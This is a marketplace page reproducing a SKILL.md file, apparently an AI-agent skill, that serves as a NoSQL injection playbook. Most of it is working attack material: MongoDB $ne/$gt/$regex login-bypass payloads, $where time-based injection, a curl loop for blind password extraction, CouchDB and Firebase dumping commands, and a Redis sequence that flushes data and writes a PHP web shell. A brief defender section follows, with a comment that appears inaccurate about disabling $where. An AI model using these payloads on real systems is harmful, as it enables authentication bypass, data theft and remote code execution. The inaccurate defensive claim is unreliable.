Skip to main content

nosqli

NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.

Jump to install

Source facts

Repository
BitterSecurity/Decepticon
Last source activity
May 26, 2026 at 03:12
Detected SKILL.md language
English
Stars
5,565
Forks
1,053

Install options

The review-first prompt is selected by default. You can switch to a direct command or download a local copy.

Review the source files

Read SKILL.md and any companion files shown by SkillsMP before deciding whether to install.

Showing SKILL.md

SKILL.md
Source instructions · Read-only preview
name
nosqli
description
NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
metadata
{"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"}
# NoSQL Injection NoSQL stores parse JSON / native objects. When user input becomes part of a query object (not just a value), control flows into the query. ## 1. MongoDB — most common target ### Auth bypass ```json // Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass}) POST /login {"user": {"$ne": null}, "pass": {"$ne": null}} // returns first user {"user": "admin", "pass": {"$gt": ""}} // admin if pw exists {"user": "admin", "pass": {"$regex": "^A"}} // blind char extraction ``` ### Server-side JS injection ```json {"$where": "this.user == 'admin' && sleep(5000)"} // time-based {"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"} ``` `$where` was deprecated in Mongo 4.4 — still appears in legacy. ### Operator extraction (blind) ```bash # Burp Intruder w/ payload list for char in {a..z}; do curl -s -X POST $TARGET/login \ -d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \ | grep -q "success" && echo "char: $char" done ``` ## 2. CouchDB ```bash # Admin party (no auth required) curl http://target:5984/_all_dbs curl http://target:5984/_users/_all_docs # Then read/modify any document ``` ## 3. Firebase Realtime Database ```bash # Public-read databases (most common misconfig) curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json # Returns entire DB if rules are "true" ``` ## 4. Redis ```bash # Unauth Redis (still common on internal nets, occasionally exposed) redis-cli -h target -p 6379 INFO # Module loading attack if running as root + module dir writable redis-cli -h target FLUSHALL redis-cli -h target SET dir /var/www/html redis-cli -h target SET dbfilename shell.php redis-cli -h target SET payload "<?php system($_GET['c']); ?>" redis-cli -h target SAVE ``` ## 5. Tools - **NoSQLMap** — automated mongo injection (`nosqlmap.py`) - **mongoaudit** — config scanner - Burp Intruder w/ payloads/NoSQL Injection/ as wordlist - **fuzzdb** — has NoSQL payload variants ## 6. PoC ```bash # Mongo auth bypass via curl curl -s -X POST $TARGET/api/login \ -H "Content-Type: application/json" \ -d '{"username": {"$ne": null}, "password": {"$ne": null}}' \ | jq # If logged-in-as-admin → critical ``` ## 7. Severity | Bug | Severity | |---|---| | Auth bypass via `$ne` | Critical 9.8 | | Blind char extraction of all user data | Critical 9.0 | | `$where` JS injection → RCE-adjacent (mongo runs the JS) | Critical 9.8 | | Public CouchDB / Firebase | Critical (depends on data sensitivity) | | Unauth Redis on internal net | High 7-8 | ## 8. Defender ```javascript // Sanitize/typecheck before query if (typeof req.body.user !== 'string') return res.status(400).send(); if (typeof req.body.pass !== 'string') return res.status(400).send(); // Or use parameterized queries / Mongo ODM (Mongoose schemas) User.findOne({user: req.body.user}).select('+password'); // Disable $where globally mongoose.set('strictQuery', true); ``` ## Cross-references - Upstream catalog: `skills/_corpus/payloads/NoSQL Injection/` - SQLi (different attack class, similar mindset): `skills/exploit/web/sqli.md`
View on GitHub